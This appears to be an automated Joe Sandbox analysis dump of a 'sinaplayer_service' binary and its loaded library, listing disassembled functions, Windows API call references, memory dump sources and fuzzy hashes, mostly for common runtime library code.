                                                                                                                                                                                                    • API ID: ??3@DictionaryValue@base@@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@Integer@$??2@D@2@@std@@0@String@
                                                                                                                                                                                                    • String ID: net_error$operation$os_error
                                                                                                                                                                                                    • API String ID: 2157804929-3557930716
                                                                                                                                                                                                    • Opcode ID: b2e936a97b9182548beb286cf092d29cf3d84a9279cc6b141b3b5e84db636a26
                                                                                                                                                                                                    • Instruction ID: 663f4be47e0c827659dd21a0a3ace6ba29e138677c6fe53da129332300bf0a7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2e936a97b9182548beb286cf092d29cf3d84a9279cc6b141b3b5e84db636a26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 174169B1D04248DFEF12DFA4C8097EEBFB4AB05324F1441A9E4057B2C1D7B91A48CB91
                                                                                                                                                                                                    Function 6C576F10 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsAlloc.KERNEL32 ref: 6C576F16
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6C576C5D), ref: 6C5A20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,?,?,?,?,?,?,6C576C5D), ref: 6C5A20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,?,?,?,?,?,?,6C576C5D), ref: 6C5A20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastThrow$Version@$AllocConcurrency@@Manager@1@Resource
                                                                                                                                                                                                    • String ID: ]lWl
                                                                                                                                                                                                    • API String ID: 3870855575-3893419207
                                                                                                                                                                                                    • Opcode ID: 95814b48cf07fa0ee8fa701303b75b5ee0ac353b167386d8fe05e248984243c2
                                                                                                                                                                                                    • Instruction ID: 14a50e4b80144c94f61ec93f91f70846b900e8dc8939182bfc2507e3ed723f8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95814b48cf07fa0ee8fa701303b75b5ee0ac353b167386d8fe05e248984243c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78112935600109EB8720EBF78C499EF7B6CBF81218B600915F909E2E54EB35C809CAF5
                                                                                                                                                                                                    Function 6C5BEEBE Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,6C630AA4,?,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000,00000000,?,?,?,?,6C5758C9,00000004), ref: 6C5BEECD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E), ref: 6C5BEED9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E), ref: 6C5BEEE0
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E), ref: 6C5BEEEE
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000), ref: 6C5BEF0A
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E,?,00000000,?,6C5769B0,00000002), ref: 6C5BEF4C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C62CF40,6C62CF40,?,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E,?,00000000), ref: 6C5BEF5A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionInformationLogicalProcessorThrowmallocstd::exception::exception
                                                                                                                                                                                                    • String ID: bad allocation$%Zl$%Zl
                                                                                                                                                                                                    • API String ID: 1610761817-3326429812
                                                                                                                                                                                                    • Opcode ID: 24f971736326d6a09113f6a5e70a722e4ab43c7d5445be6dc642245e0804799a
                                                                                                                                                                                                    • Instruction ID: d1a51d2a5ae79debb536e95034955b1879c44a935df35af877b1cffe785c3d14
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24f971736326d6a09113f6a5e70a722e4ab43c7d5445be6dc642245e0804799a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D0196366041599AD710EBA6DC51B9F7FB8EF82214F280896F805F2D80DBB499098AF5
                                                                                                                                                                                                    Function 6C576DB6 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTraceGuidsW), ref: 6C576D45
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTraceGuids), ref: 6C576D57
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TraceEvent), ref: 6C576D6A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceLoggerHandle), ref: 6C576D7D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableLevel), ref: 6C576D90
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableFlags), ref: 6C576DA3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID: GetTraceEnableFlags$GetTraceEnableLevel$GetTraceLoggerHandle$RegisterTraceGuidsW$TraceEvent$UnregisterTraceGuids
                                                                                                                                                                                                    • API String ID: 190572456-1576993034
                                                                                                                                                                                                    • Opcode ID: 68ceb1fa736c160ca9345e2c106a89bfd0e0623863f252608716b8eb3c3f776b
                                                                                                                                                                                                    • Instruction ID: a311616e0a67cbd1db6f28a67320188a25c4efcaf720f2b925a41a234b376b0b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68ceb1fa736c160ca9345e2c106a89bfd0e0623863f252608716b8eb3c3f776b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC01F4717203119B9B789F3ACDE187A7BF9FB89500704446FA906CB644DE75D844CB74
                                                                                                                                                                                                    Function 6C5C8CEC Relevance: 19.8, APIs: 13, Instructions: 290windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C5C8CF3
                                                                                                                                                                                                      • Part of subcall function 6C5C87CF: __EH_prolog3.LIBCMT ref: 6C5C87D6
                                                                                                                                                                                                      • Part of subcall function 6C5C87CF: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6C5C87ED
                                                                                                                                                                                                      • Part of subcall function 6C573AF4: TlsGetValue.KERNEL32(6C573DF7,00000000,00000000,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C573AFA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6C5C8DA2
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C5B7484,6C62CEB0), ref: 6C5C8DB7
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6C5C8DE6
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6C5C8E31
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6C5C8E5D
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6C5C8EDB
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6C5C8F24
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@$Base::Concurrency::details::Context$CancellationVisible$CreateExceptionH_prolog3H_prolog3_catchQueueThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3898879344-0
                                                                                                                                                                                                    • Opcode ID: b08113afaf671d8a87ab86bf56bac2148c460563891757d54abe04da8b426bd7
                                                                                                                                                                                                    • Instruction ID: f2c2d9e380a129945612953c0007f47c4e94a9cd8f01d5cc2ebe100d19adb956
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b08113afaf671d8a87ab86bf56bac2148c460563891757d54abe04da8b426bd7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBB16B70B01605DFDB04DFA9CD90AA9BBB1BF84348B14842EE455ABB61DB30ED45CF92
                                                                                                                                                                                                    Function 00375780 Relevance: 19.7, APIs: 13, Instructions: 198COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 0037578C
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375798
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003757A5
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003757BC
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003757F8
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375861
                                                                                                                                                                                                    • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(?), ref: 00375871
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375883
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003758A3
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003758D0
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375907
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 0037595D
                                                                                                                                                                                                    • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(?), ref: 0037596D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?gptr@?$basic_streambuf@$?gbump@?$basic_streambuf@?pbump@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2796781305-0
                                                                                                                                                                                                    • Opcode ID: f34ffda25177bdd287471dc7a0f3d8e15f27c6350972f4cf4b79dc4dd843327e
                                                                                                                                                                                                    • Instruction ID: 15227fa14501a2527d0fa8886035f25d0627b66b317c27c6c203e4e318a2dc4e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f34ffda25177bdd287471dc7a0f3d8e15f27c6350972f4cf4b79dc4dd843327e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70717E35700A05DFCB2ACF28C984669B7B5FB49320B19C55AED4A9B360DBB5FC11CB80
                                                                                                                                                                                                    Function 0038ED20 Relevance: 19.6, APIs: 13, Instructions: 110COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EventReset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2632953641-0
                                                                                                                                                                                                    • Opcode ID: fe759c2f7c77dda779d409d8707a5d5349f9ada8e77dfc7cc946cb6eb660c8f9
                                                                                                                                                                                                    • Instruction ID: 69a7ebd0ae4909e26e911be003f3d30246eb04d06760edc117e8d2c75204e47f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe759c2f7c77dda779d409d8707a5d5349f9ada8e77dfc7cc946cb6eb660c8f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2413070504B10CFEB736F34E84D7927BE8BF00305F11489EE59AC6660DB76E88A9B51
                                                                                                                                                                                                    Function 6C616878 Relevance: 19.6, APIs: 13, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?), ref: 6C616881
                                                                                                                                                                                                    • _clogf.LIBCMT(?,?), ref: 6C616899
                                                                                                                                                                                                      • Part of subcall function 6C616155: _crealf.LIBCMT(?,?), ref: 6C616163
                                                                                                                                                                                                      • Part of subcall function 6C616155: _cimagf.LIBCMT(?,?,?,?), ref: 6C616171
                                                                                                                                                                                                      • Part of subcall function 6C616155: _fdtest.MSVCR120(?,?,?,?,?), ref: 6C61617D
                                                                                                                                                                                                      • Part of subcall function 6C616155: _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6C616189
                                                                                                                                                                                                      • Part of subcall function 6C616155: __FCbuild.LIBCMT ref: 6C61635A
                                                                                                                                                                                                    • __FCmulcc.LIBCMT ref: 6C6168A6
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: _crealf.LIBCMT(?,?,00000000,?,?,?), ref: 6C6167BE
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: _cimagf.LIBCMT(?,?,?,?,00000000,?,?,?), ref: 6C6167CC
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: _crealf.LIBCMT(00000000,?,?,?,?,?,00000000,?,?,?), ref: 6C6167DA
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: _cimagf.LIBCMT(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 6C6167E8
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: __FCbuild.LIBCMT(?,?,?,?,?,?,00000000,?,?,?), ref: 6C61682A
                                                                                                                                                                                                    • _cexpf.LIBCMT(00000000,?,?,?,00000000,?,?,?), ref: 6C6168AD
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: _crealf.LIBCMT(?,?), ref: 6C615AB5
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: _cimagf.LIBCMT(?,?,?,?), ref: 6C615AC3
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: _fdtest.MSVCR120(?,?,?,?,?), ref: 6C615ACF
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6C615ADB
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: __FCbuild.LIBCMT ref: 6C615C51
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?), ref: 6C6168BD
                                                                                                                                                                                                    • _crealf.LIBCMT(?,?), ref: 6C6168D9
                                                                                                                                                                                                    • _logf.LIBCMT ref: 6C6168E2
                                                                                                                                                                                                    • __FCmulcr.LIBCMT ref: 6C6168F0
                                                                                                                                                                                                    • _cexpf.LIBCMT(00000000,?,?,?,?), ref: 6C6168F7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _cimagf$_crealf$_fdtest$Cbuild$_cexpf$CmulccCmulcr_clogf_logf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3754504586-0
                                                                                                                                                                                                    • Opcode ID: a4e0e409156d489dbc52ffeb8f4004f6c55a932f874404115945202b3e0087a7
                                                                                                                                                                                                    • Instruction ID: 30deb7b6d4198c418af13e3c9537ded182d1861aa098bce3276b686a4ad73f6e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4e0e409156d489dbc52ffeb8f4004f6c55a932f874404115945202b3e0087a7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C117F7240C10AFEDF052F68EC409ED7B69EF46325F008856F95855EA0DB338974AB2D
                                                                                                                                                                                                    Function 00375D70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 00375DA0
                                                                                                                                                                                                    • ?GetTempDir@base@@YA_NPAVFilePath@1@@Z.BASE(?), ref: 00375DB1
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,sina_player_crashes,00000013), ref: 00375DF4
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00375E08
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00375E11
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00375E24
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00375E44
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00375E55
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 00375E68
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00375E7A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$Path@1@@$V01@V01@@$??3@Append@CreateDir@base@@DirectoryExists@base@@PathTempU?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: sina_player_crashes
                                                                                                                                                                                                    • API String ID: 516180890-4205608273
                                                                                                                                                                                                    • Opcode ID: a053461720dc9468e18e089b74e0e77abbbaaf037fa5985252ded6a3c5486e28
                                                                                                                                                                                                    • Instruction ID: c6a6acff45620a32ce8f5395c178561021e1a4476914da81fab00512fe1cffda
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a053461720dc9468e18e089b74e0e77abbbaaf037fa5985252ded6a3c5486e28
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35315E71800248DFDF16DFA4CD49BEEBBB8FF05318F14015AE40AA7291DB756A49CB61
                                                                                                                                                                                                    Function 6C61AF0A Relevance: 18.3, APIs: 12, Instructions: 293COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __FDunscale.LIBCPMT ref: 6C61AF2F
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,00000001,?,?,6C61B3BE,?,?,?,?,00000004,?,00000002,?,?,6C61B606), ref: 6C61AF49
                                                                                                                                                                                                    • __fperrraise.LIBCMT ref: 6C61AF78
                                                                                                                                                                                                      • Part of subcall function 6C60FFA8: fesetexceptflag.MSVCR120(00000004,0000001F,?,?,?,?,6C61F227,00000004), ref: 6C60FFFD
                                                                                                                                                                                                      • Part of subcall function 6C60FFA8: _errno.MSVCR120(?,?,?,6C61F227,00000004), ref: 6C610009
                                                                                                                                                                                                    • __FDunscale.LIBCPMT ref: 6C61AFD0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
